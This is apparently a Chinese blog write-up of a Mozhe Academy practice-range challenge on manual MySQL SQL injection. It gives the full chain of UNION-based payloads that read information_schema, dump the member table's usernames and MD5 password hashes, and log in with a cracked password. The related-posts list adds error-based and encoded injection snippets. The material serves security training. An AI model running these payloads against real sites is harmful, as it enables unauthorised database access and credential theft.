SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)

最新推荐文章于 2023-07-12 14:44:24 发布
最新推荐文章于 2023-07-12 14:44:24 发布
阅读量3.5k 收藏
点赞数 1
分类专栏: 数据库 文章标签: sql mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Elliseaon/article/details/121244064
版权
SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)
地址:https://www.mozhe.cn/bug/djdsS0VVb0sxVytXY0NKMXZUeGJ4dz09bW96aGUmozhe?page=3

在这里插入图片描述

解题过程
  1. 寻找可注入网页,原网页尝试任意账密登录后地址栏没有回显,发现点击下图中的通知网页后地址栏信息为

    http://219.153.49.228:47011/new_list.php?id=1 //可能存在注入点
    在这里插入图片描述

  2. 寻找回显,构造Payload分别进行注入

    ?id=1 and 1=1 –

    ?id=1 and 1=2 –

在这里插入图片描述
在这里插入图片描述

说明存在注入点;
  1. 查询字段(列)数:字段数为4

    ?id=1 order by 4 –

    or

    ?id=1 order by 5 –

  2. 确认回显位置:2,3 均为回显位

    ?id=-1 union select 1,2,3,4 –

在这里插入图片描述

  1. 查询数据库名以及数据库版本:mozhe_Discuz_StormGroup

    ?id=-1 union select 1,database(),version(),4 –

在这里插入图片描述

  1. 查询数据表:StormGroup_member,notice

    ?id=-1 union select 1,group_concat(table_name),version(),4 from information_schema.tables where table_schema=database() –

在这里插入图片描述

  1. 查询字段:id,name,password,status

    ?id=-1 union select 1,group_concat(column_name),version(),4 from information_schema.columns where table_name=‘StormGroup_member’ and table_schema=database() –

在这里插入图片描述

  1. 查看字段内容:

    ?id=-1 union select 1,group_concat(id,0x3a,name,0x3a,password,0x3a,status),3,4 from StormGroup_member –

在这里插入图片描述

  1. 经查询得到两条数据,观察可得用户名name=‘mozhe’

    status(状态)一个为1,一个为0,考虑为1的密码是正确密码,经md5解密

在这里插入图片描述

  1. 登录原网页,拿到key:

在这里插入图片描述

克洛哀
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
测试具有44个漏洞点的简单小靶场-SQL注入
虚闻界的博客
08-11 1244
关于常见SQL注入的经验及小技巧,以及自己的一些学习经历
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
全村的希望
11-25 1240
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库)字符型注入
SQL手工注入漏洞测试(Access数据库)
天天学安全专属博客
11-10 772
SQL手工注入漏洞测试(Access数据库)和Access数据库注入
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6891
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
SQL注入漏洞测试(报错盲注)
qq_52718293的博客
12-11 3121
1.判断注入类型 id=1 回显正常 id=1’ and 1=1-- - 回显正常 id=1’ and 1=2-- - 回显错误 因此,判断为单字符注入 2.由于题目是报错盲注所以我们可以尝试使用报错型注入的函数尝试爆库名 http://219.153.49.228:43578/new_list.php?id=1’ and extractvalue(1,concat(’~’,(select database())))-- - 2.ok,接着爆表名 http://219.153.49.228:435
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者安全软件-免费杀毒软件
11-11
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
SQL注入漏洞-学习笔记
小龙在线
08-21 474
关系型数据库 oracle ORACLE数据库系统是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品,是目前最流行的客 户/服务器(CLIENT/SERVER)或B/S体系结构的数据库之一。比如SilverStream就是基于数据库的一种中间件。ORACLE数据 库是目前世界上使用最为广泛的数据库管理系统,作为一个通用的数据库系统,它具有完整的数据管理功能;作为一个关系 数据库,它是一个完备关系的产品;作为分布式数据库它实现了分布式处理功能。但它的所有知识,只要在一种机型上学习 了OR
达梦数据库手工注入笔记
C20220511的博客
07-12 1372
如果使用该类数据库的站点存在sql注入漏洞,用sqlmap等工具无法支持我们直接得到想要的数据,我们需要理解这些数据库的语法才能更好的进行手工注入。SYS.SYSOBJECTS表中同时保存全部的表名信息,可以使用下面的方式查询到所有的表名。可以使用下面的方式返回指定条件对应的列名,其中SCHEMA_NAME代表库名,TABLE_NAME代表表名。可以使用下面的方式查询全部库名,其中OWNER代表的是步骤1)对应的数据库用户名。可以使用下面的方式查询全部表名,这里的OWNER代表的是步骤2)对应的库名。
针对sql注入漏洞进行攻击
caribbean08的专栏
11-17 468
sql注入针对sql注入漏洞进行攻击,是全世界都感到很头疼的一件事,请专家给点意见,怎样能有效的防止这一攻击行为呢?-----------------------------------------------------------------------------------------------------回答:1.问题的描述  先举个例子说明SQL注入攻击,下面的这个SQL语句是存在攻
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1096
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
weixin_47118413的博客
06-21 2357
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 818
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1032
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入口
墨者学院——入门SQL手工注入
Zichel77的博客
05-26 1298
关于SQL注入 SQL注入是一种注入攻击,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。 攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授权访问...
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1244
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

克洛哀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值